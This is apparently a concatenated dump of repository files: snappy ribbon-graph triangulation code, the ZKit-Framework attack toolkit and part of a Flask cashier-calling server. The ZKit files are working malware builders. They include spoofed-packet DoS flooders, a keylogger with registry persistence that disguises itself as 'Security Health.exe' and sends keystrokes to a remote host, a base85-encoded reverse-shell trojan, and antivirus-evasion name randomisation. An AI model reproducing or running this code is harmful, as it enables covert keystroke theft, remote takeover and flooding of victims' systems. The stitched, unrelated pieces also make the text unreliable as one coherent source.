    for v1, v2, tet_a, w1, w2, tet_b in tuples:
        # Create each tetrahedron the first time its label is seen.
        for lbl in (tet_a, tet_b):
            if lbl not in tets:
                tets[lbl] = tetrahedron(lbl)
        pairing.append((((v1, v2), tet_a), ((w1, w2), tet_b)))
    union = RibbonGraph([Permutation(), Permutation()])
    for tet in tets.values():
        union = union.union(tet)
    return Triangulation(union, Permutation(cycles=pairing))
def doubled():
    """Return the gluing 6-tuples for a two-tetrahedron doubled triangulation."""
    gluings = [
        (0, 1, 0, 0, 1, 1),
        (1, 2, 0, 1, 2, 1),
        (2, 0, 0, 2, 0, 1),
        (1, 0, 0, 1, 0, 1),
    ]
    return gluings
def doubled2():
    """Return an alternative set of gluing 6-tuples for the doubled triangulation."""
    gluings = [
        (0, 1, 0, 1, 0, 1),
        (1, 2, 0, 2, 1, 1),
        (2, 0, 0, 0, 2, 1),
        (1, 0, 0, 0, 1, 1),
    ]
    return gluings
import snappy
def test_one_skeleton(limit):
    """Sanity-check TriangulationSkeleton on the first `limit` manifolds of
    the snappy orientable closed census.

    Prints whether the lace-component count matches 4*#edges + 2*#faces,
    whether every vertex is 4-valent, and flags manifolds whose skeleton has
    non-negative or odd Euler characteristic or more than one component.
    """
    i = 0
    for M in snappy.OrientableClosedCensus:
        if i > limit:
            break
        i += 1
        MC = snappy.snap.t3mlite.Mcomplex(M)
        # A fresh Mcomplex is built for the skeleton so MC stays untouched.
        S = TriangulationSkeleton(snappy.snap.t3mlite.Mcomplex(M))
        ec = S.ribbon_graph.euler_characteristic()
        cc = len(S.ribbon_graph.connected_components())
        lc = len(S.ribbon_graph.lace_components())
        # print(lc == (sum(e.valence() for e in MC.Edges)+sum(1 for f in MC.Faces)))
        print(lc == 4*len(MC.Edges)+2*len(MC.Faces))
        print([len(v) == 4 for v in S.ribbon_graph.vertices()])
        if (ec >= 0) or (ec%2 != 0) or (cc>1):
            print(M)
def filled_triangulation_and_triangulation_skeleton(snappy_string):
    """Build the (1,0) Dehn-filled triangulation of the named snappy manifold
    and return (Mcomplex, TriangulationSkeleton) for it.
    """
    M = snappy.Manifold(snappy_string)
    M.dehn_fill((1,0))
    MF = M.filled_triangulation()
    MC = snappy.snap.t3mlite.Mcomplex(MF)
    return MC, TriangulationSkeleton(MC)
def triangulation_and_triangulation_skeleton(snappy_string):
    """Return (Mcomplex, TriangulationSkeleton) for the named snappy manifold,
    without Dehn filling (compare filled_triangulation_and_triangulation_skeleton).
    """
    M = snappy.Manifold(snappy_string)
    # M.dehn_fill((1,0))
    # MF = M.filled_triangulation()
    MC = snappy.snap.t3mlite.Mcomplex(M)
    return MC, TriangulationSkeleton(MC)
def peripheral_curve_data(snappy_manifold):
    """Extract nonzero meridian and longitude curve weights from a snappy
    manifold's peripheral curve data.

    Returns two lists of (tet_number, vertex, face, weight) 4-tuples.
    Curve data rows come in groups of four per tetrahedron; row 0 is the
    right-handed meridian and row 2 the right-handed longitude.
    """
    indices, curve_data = snappy_manifold._get_cusp_indices_and_peripheral_curve_data()
    meridians, longitudes = [], []
    for tet_number in range(snappy_manifold.num_tetrahedra()):
        meridian_row = curve_data[4 * tet_number]
        longitude_row = curve_data[4 * tet_number + 2]
        print(meridian_row)
        print(longitude_row)
        for i in range(4):
            for j in range(4):
                m_weight = meridian_row[4 * i + j]
                if m_weight != 0:
                    meridians.append((tet_number, i, j, m_weight))
                l_weight = longitude_row[4 * i + j]
                if l_weight != 0:
                    longitudes.append((tet_number, i, j, l_weight))
    return meridians, longitudes
def collapse_to_single_vertex(ribbon_graph):
    """Repeatedly contract non-loop edges of a copy of the graph until every
    remaining edge is a loop (i.e. the graph has a single vertex), and
    return the collapsed copy.
    """
    R = ribbon_graph.copy()
    while True:
        # Find a half-edge whose opposite lies at a different vertex.
        non_loop = None
        for lab in R.labels():
            if R.opposite[lab] not in R.vertex(lab):
                non_loop = lab
                break
        if non_loop is None:
            return R
        contract_edge(R, non_loop)
def spanning_tree(ribbon_graph, start_label):
    # NOTE(review): unfinished stub — performs the vertex search but never
    # builds or returns a tree (implicitly returns None). Confirm intent.
    half_edges = ribbon_graph._vertex_search(start_label)
"""
def _get_cusp_indices_and_peripheral_curve_data(self):
cdef int i, j, k, v, f
cdef TriangulationData* data
triangulation_to_data(self.c_triangulation, &data)
result_cusp_indices = []
for i from 0 <= i < self.num_tetrahedra():
row = []
for v from 0 <= v < 4:
row.append(
data.tetrahedron_data[i].cusp_index[v]
)
result_cusp_indices.append(row)
result_curves = []
for i from 0 <= i < self.num_tetrahedra():
for j from 0 <= j < 2: # meridian, longitude
for k from 0 <= k < 2: # righthanded, lefthanded
row = []
for v from 0 <= v < 4:
for f from 0 <= f < 4:
row.append(
data.tetrahedron_data[i].curve[j][k][v][f]
)
result_curves.append(row)
free_triangulation_data(data)
return (result_cusp_indices, result_curves)
"""
|
{"/ribbon_graph_base.py": ["/permutation.py", "/cycle.py"], "/maps.py": ["/permutation.py"], "/draw.py": ["/cycle.py", "/decompositions.py"], "/decompositions.py": ["/cycle.py"], "/__init__.py": ["/ribbon_graph_base.py", "/cycle.py", "/maps.py", "/permutation.py", "/trees.py", "/decompositions.py"], "/cycle.py": ["/local_moves.py"], "/trees.py": ["/ribbon_graph_base.py", "/permutation.py"], "/three_manifold.py": ["/permutation.py", "/ribbon_graph_base.py", "/cycle.py", "/local_moves.py"]}
|
27,882
|
lbh3110/ZKit-Framework
|
refs/heads/master
|
/ZKit_Core/Dos_Attackers/SM.py
|
def Run(*self, Source_IP, Victim_IP, Source_Port, Victim_Ports, Count, Message):
from scapy.all import sendp as Send, TCP as tcp, IP as ip
from time import sleep as Sleep
from sys import exit as Exit
print("This Operation Needs Administrator Permission")
print("Running UAC")
Victim_Ports = Victim_Ports.split()
if Count != "-1":
print("Press Ctrl + C To Stop The Process")
for i in range(0, Count):
try:
IP = ip(src=Source_IP, dst=Victim_IP)
TCP = tcp(sport=Source_Port, dport=(
[Victim_Port for Victim_Port in Victim_Ports]))
Packet = IP / TCP / Message
Send(Packet)
print("Send Packet To Target {} from IP {} And Port {} To Port {}".format(
Victim_IP, Source_IP, Source_Port, Victim_Port))
except KeyboardInterrupt:
print("Already Send {} Packets To Target {} from IP {} And Port {} To Port {}".format(
i, Victim_IP, Source_IP, Source_Port, Victim_Port))
break
Sleep(2)
Exit(0)
else:
i = 0
while True:
try:
print("Press Ctrl + C To Stop The Process")
IP = ip(source_IP=Source_IP, destination=Victim_IP)
TCP = tcp(srcport=Source_Port, dstport=(
[Victim_Port for Victim_Port in Victim_Ports]))
Packet = IP / TCP / Message
Send(Packet)
print("Send Packet To Target {} from IP {} And Port {} To Port {}".format(
Victim_IP, Source_IP, Source_Port, Victim_Port))
i += 1
except KeyboardInterrupt:
print("Already Send {} Packets To Target {} from IP {} And Port {} To Port {}".format(
i, Victim_IP, Source_IP, Source_Port, Victim_Port))
Sleep(2)
Exit(0)
|
{"/zkit.py": ["/ZKit_Core/Trojans/Reverse_Shell_TCP.py", "/ZKit_Core/Dos_Attackers/SS.py", "/ZKit_Core/KeyLoggers/TCP.py", "/ZKit_Core/Trojans/UDP_Connect.py"]}
|
27,883
|
lbh3110/ZKit-Framework
|
refs/heads/master
|
/ZKit_Core/Dos_Attackers/SS.py
|
def Run(*self, Source_IP, Victim_IP, Source_Port, Victim_Port, Count, Message):
print("Scapy Needs Administrator Permission")
from scapy.all import sendp as Send
from scapy.all import IP as ip, TCP as tcp
import scapy.all
from time import sleep as Sleep
from sys import exit as Exit
i = 0
if Count != "-1":
print("Press Ctrl + C To Stop The Process")
for i in range(0, Count):
try:
IP = ip(src=Source_IP, dst=Victim_IP)
TCP = tcp(sport=Source_Port, dport=Victim_Port)
Packet = IP / TCP / Message
Send(Packet)
print("Send Packet To Target {} from IP {} And Port {} To Port {}".format(
Victim_IP, Source_IP, Source_Port, Victim_Port))
except KeyboardInterrupt:
print("Already Send {} Packets To Target {} from IP {} And Port {} To Port {}".format(
i, Victim_IP, Source_IP, Source_Port, Victim_Port))
break
Sleep(2)
Exit(0)
else:
print("Press Ctrl + C To Stop The Process")
i = 0
while True:
try:
IP = ip(src=Source_IP, dst=Victim_IP)
TCP = tcp(sport=Source_Port, dport=Victim_Port)
Packet = IP / TCP / Message
Send(Packet)
print("Send Packet To Target {} from IP {} And Port {} To Port {}".format(
Victim_IP, Source_IP, Source_Port, Victim_Port))
i += 1
except KeyboardInterrupt:
print("Already Send {} Packets To Target {} from IP {} And Port {} To Port {}".format(
i, Victim_IP, Source_IP, Source_Port, Victim_Port))
Sleep(2)
Exit(0)
|
{"/zkit.py": ["/ZKit_Core/Trojans/Reverse_Shell_TCP.py", "/ZKit_Core/Dos_Attackers/SS.py", "/ZKit_Core/KeyLoggers/TCP.py", "/ZKit_Core/Trojans/UDP_Connect.py"]}
|
27,884
|
lbh3110/ZKit-Framework
|
refs/heads/master
|
/ZKit_Core/KeyLoggers/TCP.py
|
import colorama
import socket
def Create(*self, Host, Port, a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11, a12, a13, a14, PATH):
from time import sleep as Sleep
Red, Blue, Green, Reset = colorama.Fore.LIGHTRED_EX, colorama.Fore.LIGHTBLUE_EX, colorama.Fore.LIGHTGREEN_EX, colorama.Fore.RESET
print("[", Green + "!" + Reset + "]" + Reset +
"Opening File To Write Data On It...", end="")
Sleep(0.2)
try:
f = open(PATH, "w+")
except:
print(
"\r[" + Red + "-" + "]" + Reset + "Opening File To Write Data On It...Failed \n Cannnot Open File")
Sleep(0.2)
return False
else:
print("\r[" + Blue + "+" + Reset + "]" + Reset +
"Opening File To Write Data On It...Done")
Sleep(0.2)
KeyLogger_Data = """
from winreg import OpenKey , SetValueEx
from pynput.keyboard import Key, Listener
import logging
from os import system
def {a1}() :
{a2} = str(__file__)
{a3} = open({a2} , "rb")
{a4} = {a3}.read()
{a3}.close()
{a5} = r"C:\Windows\system32\Security Health.exe"
{a6} = open({a5} , "wb")
{a6}.write({a4})
{a6}.close()
system({a6})
{a7}="Software\\Microsoft\\Windows\\CurrentVersion\\Run"
{a8} = OpenKey("HKEY_LOCAL_MACHINE",{a7},0,"KEY_ALL_ACCESS")
SetValueEx({a7}, "SecurityHealth",0,"REG_SZ", {a5})
def {a13}({a9}):
global {a10}
{a10} += {a9}
{a11}.send({a10}.encode('UTF-8'))
if __name__ == "__main__":
{a10} = ""
{a1}()
import socket
{a12} = False
while not {a12} :
try :
{a11} = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
port = {p}
host = "{h}"
{a11}.connect((host , port))
{a12} = True
except :
{a12} = False
while {a12} :
try :
with Listener(on_press={a13}) as {a14}:
{a14}.join()
except :
{a12} = False
""".format(h=Host, p=Port, a1=a1, a2=a2, a3=a3, a4=a4, a5=a5, a6=a6, a7=a7, a8=a8, a9=a9,
a10=a10, a11=a11, a12=a12, a13=a13, a14=a14)
from colorama import Fore
Red, Blue, Green, Reset = Fore.LIGHTRED_EX, Fore.LIGHTBLUE_EX, Fore.LIGHTGREEN_EX, Fore.RESET
from time import sleep as Sleep
print("[" + Green + "!" + Reset + "]" +
Reset + "Writing Data On File...", end="")
try:
f.write(KeyLogger_Data)
except PermissionError:
print("\r[" + Red + "-" + Reset + "]" + Reset + "Writing Data On File...Failed \nSomething Went Wrong . Looks Like "
"You Dont Have Access To The File.")
except:
print("\r[", Red + "-", "]" + Reset + "Writing Data On File...Failed \nSomething Went Wrong . Is Another Process "
"Using It ? ")
Sleep(0.2)
print("[", Red + "-", "]" + Reset +
"Couldnt Write Data On File Closing File...", end="")
f.close()
Sleep(0.2)
print("Done")
else:
print("\r[" + Blue + "+" + Reset + "]" + Reset +
"Writing Data On File...Done")
print("[" + Blue + "+" + Reset + "]",
Fore.RESET + "Succesfully Created KeyLogger")
Sleep(1)
|
{"/zkit.py": ["/ZKit_Core/Trojans/Reverse_Shell_TCP.py", "/ZKit_Core/Dos_Attackers/SS.py", "/ZKit_Core/KeyLoggers/TCP.py", "/ZKit_Core/Trojans/UDP_Connect.py"]}
|
27,885
|
lbh3110/ZKit-Framework
|
refs/heads/master
|
/ZKit_Core/Trojans/UDP_Connect.py
|
import socket
from colorama import Fore
def Connect(self):
Connection = socket.socket(socket.AF_INET , socket.SOCK_DGRAM)
print("[" + Fore.LIGHTBLUE_EX + '+' + "] Making Connection")
try:
Victim, Address = Connection.accept()
os = Victim.recv(1024).decode('UTF-8')
print("[" + Fore.LIGHTBLUE_EX + '+' + "] Got Platfrom from victim")
Connected = True
while Connected :
self.Command = str(
input("{Victim}@{os} ".format(Victim = Address ,os = os)))
Connection.send(self.Command.encode("UTF-8"))
print(Connection.recv(1024).decode("UTF-8"))
except :
Connected = False
print("[" + Fore.LIGHTRED_EX + '-' + "] Connection Failed.Victim Might Be Offline Try Again Later")
return False
|
{"/zkit.py": ["/ZKit_Core/Trojans/Reverse_Shell_TCP.py", "/ZKit_Core/Dos_Attackers/SS.py", "/ZKit_Core/KeyLoggers/TCP.py", "/ZKit_Core/Trojans/UDP_Connect.py"]}
|
27,886
|
lbh3110/ZKit-Framework
|
refs/heads/master
|
/ZKit_Core/Trojans/Reverse_Shell_TCP.py
|
import colorama
import socket
from base64 import b85encode , b85decode
def Create(*self, Host, Port, str1, str2, str3, str4, PATH):
"""Creates Reverse_Shell Trojan With Parameters"""
from time import sleep as Sleep
Red, Blue, Green, Reset = colorama.Fore.LIGHTRED_EX, colorama.Fore.LIGHTBLUE_EX, colorama.Fore.LIGHTGREEN_EX, colorama.Fore.RESET
print("[" , Green + "!" + Reset + "]" + Reset +
"Opening File To Write Data On It...", end = "")
Sleep(0.2)
try:
f = open(PATH, "w+")
except:
print(
"\r["+ Red + "-" + "]" + Reset + "Opening File To Write Data On It...Failed \n Cannnot Open File")
Sleep(0.2)
return False
else:
print("\r[" + Blue + "+" + Reset + "]" + Reset +
"Opening File To Write Data On It...Done")
Sleep(0.2)
Trojan_Data = """
import socket
import os
import sys
{Connected} = False
while not {Connected} :
try :
{Connection} = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
port = {p}
host = "{h}"
{Connection}.connect((host , port))
{Connected} = True
except :
{Connected} = False
while {Connected} :
try :
{Connection}.send((sys.platform).encode('UTF-8'))
{Command} = {Connection}.recv(1024).decode("UTF-8")
if {Command}.strip().split() == "cd " :
{Result} = os.chdir({Command}.strip('cd '))
elif {Command}.strip().split() == "CD " :
{Result} = os.chdir({Command}.strip('CD '))
else :
{Result} = os.popen({Command}).read()
{Connection}.send({Result}.encode("UTF-8"))
except :
{Connected} = False
'''
""".format(Connected=str1, Connection=str2, Command=str3, Result=str4, h=Host, p=Port)
from colorama import Fore
Red , Blue , Green , Reset = Fore.LIGHTRED_EX, Fore.LIGHTBLUE_EX, Fore.LIGHTGREEN_EX, Fore.RESET
from time import sleep as Sleep
print("[" + Blue + "+" + Reset + "]" + Reset + "Encrypting Data Before Writing On File...\n")
Trojan_data=str(b85encode(bytes(Trojan_Data, 'UTF-8')))
Trojan_data= "value = '''\n" + Trojan_data + "\n'''\n"
Trojan_data+='''
value = bytes(value, 'UTF-8')
script_data = b85decode(value)
eval(compile(script_data.decode('UTF-8')))
'''
print("[" + Green + "!" + Reset + "]" + Reset + "Writing Data On File...", end="")
try:
f.write()
except PermissionError:
print("\r[" + Red + "-"+ Reset + "]"+ Reset + "Writing Data On File...Failed \nSomething Went Wrong . Looks Like "
"You Dont Have Access To The File.")
except:
print("\r[" , Red + "-", "]"+ Reset + "Writing Data On File...Failed \nSomething Went Wrong . Is Another Process "
"Using It ? ")
Sleep(0.2)
print("[" , Red + "-", "]" + Reset + "Couldnt Write Data On File Closing File...", end="")
f.close()
Sleep(0.2)
print("Done")
else:
print("\r[" + Blue + "+" + Reset + "]" + Reset + "Writing Data On File...Done")
print("[" + Blue + "+" + Reset + "]", Fore.RESET + "Succesfully Created Trojan")
Sleep(1)
|
{"/zkit.py": ["/ZKit_Core/Trojans/Reverse_Shell_TCP.py", "/ZKit_Core/Dos_Attackers/SS.py", "/ZKit_Core/KeyLoggers/TCP.py", "/ZKit_Core/Trojans/UDP_Connect.py"]}
|
27,887
|
lbh3110/ZKit-Framework
|
refs/heads/master
|
/zkit.py
|
'ZKit-Framework Github : https://github.com/000Zer000/ZKit-Framework'
from sys import platform
__all__ = ["why_do_you_want_to_import_this"]
def why_do_you_want_to_import_this():
'Why do you want to import this'
return "Why_Do_You_Want_To_Import_This"
__author__ = 'Zer0'
# Created A New Header
__github__ = 'https://github.com/000Zer000/ZKit-Framework'
__version__ = '1.0.0'
__license__ = 'Apache License 2.0'
__status__ = 'Developing'
if __name__ == "__main__":
try:
from os import path
from time import sleep as Sleep
from colorama import init, Fore
from ZKit_Banners import Banners
except ImportError as value:
import sys
print("One Or Some On Requirments Not Found . Please Install Them And Try Again ."
+ "Python Threw : " + str(value))
sys.exit(1)
# Initallizing Needed Variables
PATH = path.dirname(__file__)
T_PATH = PATH + "/Builded/Trojan/"
D_PATH = PATH + "/Builded/Dos/"
K_PATH = PATH + "/Builded/KeyLogger/"
R_PATH = PATH + "/Builded/Ransomware/"
init(convert=True)
errors = list('Errors')
print(Fore.LIGHTGREEN_EX + Banners.Banner1 + Fore.RESET)
Sleep(1)
while True:
CHOICES = str(input("ZKit > "))
Choice = CHOICES.split()
try:
if Choice[0] == "trojan" and Choice[5] == "-h" and Choice[7] == "-p":
from ZKit_Core import Main_Process
file_name = T_PATH + Choice[4] + ".pyw"
file_name = Main_Process.Create_File(PATH=file_name)
strs = Main_Process.Anti_Anti_Virus(Count=4)
str1, str2, str3, str4 = list(strs)
if Choice[2] == 'tcp':
import ZKit_Core.Trojans.Reverse_Shell_TCP
ZKit_Core.Trojans.Reverse_Shell_TCP.Create(
Host=Choice[6], Port=Choice[8], str1=str1,
str2=str2, str3=str3, str4=str4, PATH=file_name
)
elif Choice[2] == 'udp':
import ZKit_Core.Trojans.Reverse_Shell_UDP
ZKit_Core.Trojans.Reverse_Shell_UDP.Create(
Host=Choice[6], Port=Choice[8], str1=str1, str2=str2,
str3=str3, str4=str4, PATH=file_name)
elif Choice[2] == 'connect':
if Choice[3] == '-tcp':
import ZKit_Core.Trojans.TCP_Connect
ZKit_Core.Trojans.TCP_Connect.Connect()
if Choice[3] == '-tcp':
import ZKit_Core.Trojans.UDP_Connect
ZKit_Core.Trojans.UDP_Connect.Connect()
elif Choice[0] == 'dos' and (
Choice[1] == 'ss' and Choice[3] == '-s' and Choice[5] == '-v'):
import ZKit_Core.Dos_Attackers.SS
ZKit_Core.Dos_Attackers.SS.Run(
Source_IP=Choice[4], Victim_IP=Choice[6], Source_Port=Choice[6],
Victim_Port=Choice[7], Count=Choice[9], Message=Choice[8])
elif Choice[0] == "keylogger" and Choice[5] == "-h" and Choice[7] == "-p":
print('Attention : This Payload Is for Windows And Must Be Compiled .'
+ 'It Can be easily compiled with pyinstaller')
from ZKit_Core import Main_Process as ms
file_name = K_PATH + Choice[4] + ".pyw"
file_name = Main_Process.Create_File(PATH=file_name)
strs = ms.Anti_Anti_Virus(Count=14)
list(strs)
if Choice[2] == 'tcp':
import ZKit_Core.KeyLoggers.TCP
ZKit_Core.KeyLoggers.TCP.Create(
Host=Choice[6], Port=Choice[8], a1=strs[0],
a2=strs[1], a3=strs[2], a4=strs[3], a5=strs[4],
a6=strs[5], a7=strs[6], a8=strs[7], a9=strs[8],
a10=strs[9], a11=strs[10], a12=strs[11],
a13=strs[12], a14=strs[13], PATH=file_name)
elif Choice[2] == 'udp':
import ZKit_Core.KeyLoggers.UDP
ZKit_Core.KeyLoggers.TCP.Create(
Host=Choice[6], Port=Choice[8], a1=strs[0],
a2=strs[1], a3=strs[2], a4=strs[3], a5=strs[4],
a6=strs[5], a7=strs[6], a8=strs[7], a9=strs[8],
a10=strs[9], a11=strs[10], a12=strs[11],
a13=strs[12], a14=strs[13], PATH=file_name)
elif Choice[0] == 'debug' :
print(errors)
elif CHOICES == 'help':
print(''' *Case sensetive*
# Trojans
trojan -m tcp -f FILENAME -h IP -p PORT
trojan -m tcp -f FILENAME -h HOST -p PORT
trojan -m udp -f FILENAME -h HOST -p PORT
trojan -m udp -f FILENAME -h IP -p PORT
# Trojan controllers
trojan -m connect -tcp
trojan -m connect -tcp
# Dos Attackers
dos -m ss -s SOURCE_IP_OR_HOST SOURCE_PORT -v VICTIM_IP_OR_HOST VICTIM_PORT -m MESSAGE -c COUNT
dos -m sm -s SOURCE_IP_OR_HOST SOURCE_PORT -v VICTIM_IP_OR_HOST VICTIM_PORTS -m MESSAGE -c COUNT
# KeyLogger
keylogger -m tcp -f FILENAME -h IP -p PORT
keylogger -m tcp -f FILENAME -h HOST -p PORT
keylogger -m udp -f FILENAME -h HOST -p PORT
keylogger -m udp -f FILENAME -h IP -p PORT
''')
else:
print("{} Is Not A Valid Input\n".format(CHOICES))
except Exception as value:
value = str(value)
print("Invalid Input Or Not enough Arguments type 'help' to see available commands type . 'debug' to see python exception value(s)")
errors.append(value)
|
{"/zkit.py": ["/ZKit_Core/Trojans/Reverse_Shell_TCP.py", "/ZKit_Core/Dos_Attackers/SS.py", "/ZKit_Core/KeyLoggers/TCP.py", "/ZKit_Core/Trojans/UDP_Connect.py"]}
|
27,888
|
lbh3110/ZKit-Framework
|
refs/heads/master
|
/ZKit_Core/Trojans/__init__.py
|
'Sth'
|
{"/zkit.py": ["/ZKit_Core/Trojans/Reverse_Shell_TCP.py", "/ZKit_Core/Dos_Attackers/SS.py", "/ZKit_Core/KeyLoggers/TCP.py", "/ZKit_Core/Trojans/UDP_Connect.py"]}
|
27,889
|
lbh3110/ZKit-Framework
|
refs/heads/master
|
/ZKit_Core/Main_Process.py
|
import random
import string
def random_string(*size):
size = random.randint(2, 9)
chars = string.ascii_lowercase + string.ascii_uppercase
return ''.join(random.choice(chars) for _ in range(size))
def random_int(size, max, min):
ints = string.digits
while True:
random_int = ''.join(random.choice(ints) for _ in range(size))
if random_int <= max and random_int >= min:
return random_int
else:
pass
def random_ip():
dot = "."
Result = random_int(4, 255, 1) + dot + random_int(4, 255, 1) + \
dot + random_int(4, 255, 1) + dot + random_int(4, 255, 1)
return Result
def Create_File(*self, PATH):
from colorama import Fore
Red, Blue, Green, Reset = Fore.LIGHTRED_EX, Fore.LIGHTBLUE_EX, Fore.LIGHTGREEN_EX, Fore.RESET
from time import sleep as Sleep
print("[" + Green + "!" + Reset + "]" + Reset + "Creating File...", end="")
try:
f = open(PATH, "x").close()
except FileExistsError:
Sleep(0.5)
choice = str(input(
"\r[" + Red + "-" + Reset + "]" + Reset + "Creating File...Failed \nFile Already Exists Confirm Overwrite : (N or Y)"))
Choice = choice.upper()
if Choice == "Y":
return PATH
elif Choice == "N":
file_name = str(input("Write Down File Name Here : "))
file_name += ".pyw"
return file_name
else:
print(Red + "\r[!]" + Reset + "In Valid Input", end="")
return ''
else:
file_name = PATH
print("\r[" + Blue + "+" + Reset + "]" +
Reset + "Creating File...Done", end="")
return file_name
def Anti_Anti_Virus(*self, Count):
from colorama import Fore
Red, Blue, Green, Reset = Fore.LIGHTRED_EX, Fore.LIGHTBLUE_EX, Fore.LIGHTGREEN_EX, Fore.RESET
from time import sleep as Sleep
print("[" + Green + "!" + Reset + "]" +
"Generating Random String To Decrease AV Ditection...", end="")
Sleep(0.2)
try:
Result = tuple()
for i in range(0, Count):
Result = Result + (random_string(), )
except:
print("\r[" + Red + "-" + Reset + "]" +
"Generating Random String To Decrease AV Ditection...Failed ", end="")
Sleep(1)
print("\r[" + Green + "!" + Reset + "]" +
"Generating Random String To Decrease AV Ditection...Failed -> Passed")
Sleep(0.2)
return False
else:
print("\r[" + Blue + "+" + Reset + "]" +
"Generating Random String To Decrease AV Ditection...Done")
return Result
|
{"/zkit.py": ["/ZKit_Core/Trojans/Reverse_Shell_TCP.py", "/ZKit_Core/Dos_Attackers/SS.py", "/ZKit_Core/KeyLoggers/TCP.py", "/ZKit_Core/Trojans/UDP_Connect.py"]}
|
27,892
|
INFINIT-PLUS-GIT/ccs-server
|
refs/heads/master
|
/modelos.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) Lisoft & AV Electronics - All Rights Reserved
# Unauthorized copying of this file, via any medium is strictly prohibited
# Proprietary and confidential
# Written by Rodrigo Tufiño <rtufino@lisoft.net>, December 2019
"""
Módulo con los modelos y administración de la base de datos
"""
from os import environ
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_script import Manager
from flask_migrate import Migrate, MigrateCommand
from dotenv import load_dotenv, find_dotenv
load_dotenv(find_dotenv())
app = Flask(__name__)
# Configuraciones
app.config['SQLALCHEMY_DATABASE_URI'] = environ.get('DATABASE')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
# Variables
db = SQLAlchemy(app)
migrate = Migrate(app, db)
manager = Manager(app)
manager.add_command('db', MigrateCommand)
class Banco(db.Model):
__tablename__ = 'banco'
id = db.Column(db.Integer, primary_key=True)
nombre = db.Column(db.String(64), nullable=False, unique=True)
estado = db.Column(db.Integer, nullable=False, default=1)
def __repr__(self):
return f'<Banco {self.nombre}>'
@staticmethod
def get_by_id(id):
return Banco.query.get(id)
class Sucursal(db.Model):
__tablename__ = 'sucursal'
id = db.Column(db.Integer, primary_key=True)
banco = db.Column(db.Integer, db.ForeignKey('banco.id'), nullable=False)
nombre = db.Column(db.String(64), nullable=False)
direccion = db.Column(db.Text, nullable=True)
telefono = db.Column(db.Text, nullable=True)
estado = db.Column(db.Integer, nullable=False, default=1)
class TipoCaja(db.Model):
__tablename__ = 'tipo_caja'
id = db.Column(db.Integer, primary_key=True)
banco = db.Column(db.Integer, db.ForeignKey('banco.id'), nullable=False)
nombre = db.Column(db.String(64), nullable=False)
estado = db.Column(db.Integer, nullable=False, default=1)
class Caja(db.Model):
    """Cashier desk ('caja') attached to a branch and a desk type.

    ``numero`` is the public desk number used by callers; ``grupo`` groups
    desks onto display screens; ``direccion``/``audio`` drive the viewer UI.
    """
    __tablename__ = 'caja'
    id = db.Column(db.Integer, primary_key=True)
    sucursal = db.Column(db.Integer, db.ForeignKey('sucursal.id'), nullable=False)
    tipo_caja = db.Column(db.Integer, db.ForeignKey('tipo_caja.id'), nullable=False)
    numero = db.Column(db.Integer, nullable=False)
    grupo = db.Column(db.Integer, nullable=False)
    direccion = db.Column(db.String(3), nullable=False)
    audio = db.Column(db.String(16), nullable=False)
    # estado: 1 = active (default).
    estado = db.Column(db.Integer, nullable=False, default=1)
    @staticmethod
    def get_by_numero(numero):
        """Return the first Caja whose numero matches, or None."""
        return Caja.query.filter_by(numero=numero).first()
    @staticmethod
    def get_grupos():
        """Return the list of distinct grupo values among active cajas."""
        rows = Caja.query.filter_by(estado=1).group_by('grupo').all()
        # Idiom: comprehension replaces the manual append loop.
        return [r.grupo for r in rows]
class Hub(db.Model):
    """Physical hub device installed at a branch."""
    __tablename__ = 'hub'
    # Primary key doubles as FK to sucursal.id: at most one hub per branch.
    id = db.Column(db.Integer, db.ForeignKey('sucursal.id'), primary_key=True)
    serial = db.Column(db.String(10), nullable=False, unique=True)
    fecha_instalacion = db.Column(db.DateTime, nullable=True)
    parametros = db.Column(db.Text, nullable=True)
    # estado: 1 = active (default).
    estado = db.Column(db.Integer, nullable=False, default=1)
    @staticmethod
    def get_by_serial(serial):
        """Return the Hub with the given serial number, or None."""
        return Hub.query.filter_by(serial=serial).first()
class Registro(db.Model):
    """Call record: one row each time a cashier call is displayed."""
    __tablename__ = 'registro'
    id = db.Column(db.Integer, primary_key=True)
    # Declared as FK to caja.id.
    caja = db.Column(db.Integer, db.ForeignKey('caja.id'), nullable=False)
    fecha = db.Column(db.DateTime, nullable=False)
    estado = db.Column(db.Integer, nullable=False)
    def __repr__(self):
        return f'<Registro caja={self.caja}, fecha={self.fecha}, estado={self.estado}>'
class Evento(db.Model):
    """Lifecycle event reported by a hub (e.g. startup)."""
    __tablename__ = 'evento'
    id = db.Column(db.Integer, primary_key=True)
    # Foreign key to hub.id.
    hub = db.Column(db.Integer, db.ForeignKey('hub.id'), nullable=False)
    fecha = db.Column(db.DateTime, nullable=False)
    descripcion = db.Column(db.Text, nullable=True)
    estado = db.Column(db.Integer, nullable=False)
    def __repr__(self):
        # BUG FIX: the original repr was copy-pasted from Registro -- it
        # labelled itself '<Registro ...>' and read self.caja, an attribute
        # Evento does not have (AttributeError at repr time).
        return f'<Evento hub={self.hub}, fecha={self.fecha}, estado={self.estado}>'
if __name__ == "__main__":
    # Database-administration entry point (Flask-Script + Flask-Migrate):
    # ref: https://programadorwebvalencia.com/tutorial-flask-para-crear-chat-con-socketio-y-vuejs/
    #
    # python3 modelos.py db init
    # python3 modelos.py db migrate
    # python3 modelos.py db upgrade
    manager.run()
|
{"/app.py": ["/modelos.py"]}
|
27,893
|
INFINIT-PLUS-GIT/ccs-server
|
refs/heads/master
|
/app.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) Lisoft & AV Electronics - All Rights Reserved
# Unauthorized copying of this file, via any medium is strictly prohibited
# Proprietary and confidential
# Written by Rodrigo Tufiño <rtufino@lisoft.net>, December 2019
"""
ccs-server.app
~~~~~~~~~~~~~~
Aplicación de servidor para registrar y visualizar llamadas de cajas
"""
from datetime import datetime
from os import environ
from flask import Flask, render_template, request, abort
from dotenv import load_dotenv, find_dotenv
from flask_socketio import SocketIO, emit, disconnect
from modelos import db, Hub, Evento, Caja, Registro
__author__ = 'Rodrigo Tufiño'
__copyright__ = 'Copyright 2020, Cashier Calling System'
__credits__ = ['LISOFT', 'AV Electronics']
__license__ = 'Privative'
__version__ = '1.2.0'
__maintainer__ = 'LISOFT'
__email__ = 'rtufino@lisoft.net'
__status__ = 'Dev'
# Load configuration from the nearest .env file
